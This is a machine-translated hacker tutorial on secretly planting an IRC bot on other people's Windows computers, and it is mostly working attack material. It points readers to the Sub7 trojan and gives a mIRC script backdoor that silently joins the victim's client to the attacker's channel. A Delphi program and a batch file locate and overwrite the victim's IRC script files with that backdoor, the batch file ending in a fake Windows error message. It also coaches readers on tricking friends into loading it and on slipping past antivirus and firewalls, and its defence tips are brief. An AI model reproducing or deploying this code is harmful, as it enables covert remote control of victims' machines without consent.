This page has been robot translated, sorry for typos if any. Original content here.

We hang a bot on Windows.



1. Intro.
2. Trojans.
3. mIRC scripts.
I. writing your script backdoor
II. write a program on delphi that will insert a backdoor into the enemy mIRC
III. write a batch program that will insert a backdoor into the enemy mIRC
IV. social engineering: vparivaem prog =)
4. Both methods in comparison.
5. How to protect yourself.
6. Outro.

1. Nowadays, among the owners of popular channels, it has become fashionable to hang dozens of bots from different linux shells on the channels to ensure, so to speak, "channel security". Of course, I have nothing against any eggdrops there, but what about simple mortal users who have neither shell, nor ss, nor knowledge (like for example the elite from channel # 31337 on the irc.dal.net.ru server =)? So in this article I will tell you how to hang a bot on a machine with a win-like OS.
IMHO, there are only two ways to accomplish this: trojans and trojans =) Let's start from the first.

2. If you were on msn (irc.msn.com) before closing it, then you probably managed to enjoy the nth number of bots on the channels #russian_chat, #russian_girls, #russian_andybig and so on. So, these bots are far from eggdrops. These are, so to speak, SubSevens. Heard about such a horse? Sub7 is the only trojan in my memory that allowed me to remotely hang an irc-bot (I haven’t used trojans for a long time, so I don’t know if it has any analogues). So download Sub'a from here and enjoy. Those who are not used to looking for easy ways can read on.

3. The possibilities of mirc-scripts are very impressive. Write on them the same cgi-scanner is a trifling matter, not to mention a simple bot. For example, take the WarSatan script. Such a "simple bot" is built into it. When you connect to your favorite irc-server, the script simultaneously connects the guest user to the irc.webchat.org server and leads it to the channels #CHATOP, #MEKAH and #PANGKOR. That is the whole mechanism of work. Our task is to write the same simple backdoor in the form of a world-plugin.
I. I will comment on the most important lines.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


We remove the comments, substitute our values, number the lines (just copy it all into the mIRC editor and save - he will number it all) and save the resulting control.dll file.
The backdoor itself is ready. Now it remains to insert it into someone else's script.ini.

II. Here is the source for the delphi program, which searches for the script.ini file on the screw and, if the search is successful, replaces it with ours.

Important! Control.dll must be kept in the same directory with this program.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. If you haven’t been engaged in coding since your birth and you are throwing yeast at the word "compiler", let's write such a program on batch'ah.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

This canoe searches for mIRC, NeoRa Trion and Looksharp using a spear. The likelihood of finding it is rather insignificant, so it is advisable to trick the subject into putting this file together with control.dll in the same directory with its irc client. In the case of a successful search result, the file replaces the other script.ini with our control.dll.
Convert this bat'nik to exe'shnik with some bat2exec and you can pair your friends.

IV. I think it’s not for me to tell you about how to "vparivat" someone exe'shnik. I just want to emphasize one feature. Agree, the request to launch your exe'shnik will arouse suspicion even from the most distant user. So, you can go the other way. To do this, we return to point I. DO NOT number the lines of the script, just put it in the joke.mrc file. Everything. Now distribute it to your friends with the words: put it in the directory with your little world, enter "/ load -rs joke.mrc" in its console and enjoy all the delights of the plugin =)

4. And so, what is the better way to replace script.ini?
1) is not caught by antiviruses
2) not caught by FairWalls. I think many immediately with foam from the mouth will begin to prove that ZoneAlarm and AtGuard will protect them from this. Special for them I explain: if mIRC in these two firewalls is registered as Allowed server \ client, then fv will not even pop up when the backdoor opens the connection.
3) it is difficult to detect / kill even an experienced user

5. Well, now about how to defend ourselves. Again, I will not consider the method with Sub7 (because everything is clear with it: AVP + ZoneAlarm), I will immediately go to the second one.
To detect a script backdoor, you should use some kind of mIRC plugin like IPSearch, which would search on a user’s server with the same type as yours. If there is one, then someone definitely hung a bot on you. If this is not found, then either the bot on another server, or you're clean.
Also, the same ZAlarm can be used to detect a bot: at the moment, the largest IRC servers check all clients for proxies. How? Simple port scan. So, if you connect to the irc.some.com server, and some irc.lame.com scans the ports of the cha, then it’s worth considering ...
How to kill a backdoor? If you do not understand scripting, just reinstall the irc client.

6. Well, what can be said at the end? Do not use unfamiliar scripts and do not force others to do this =)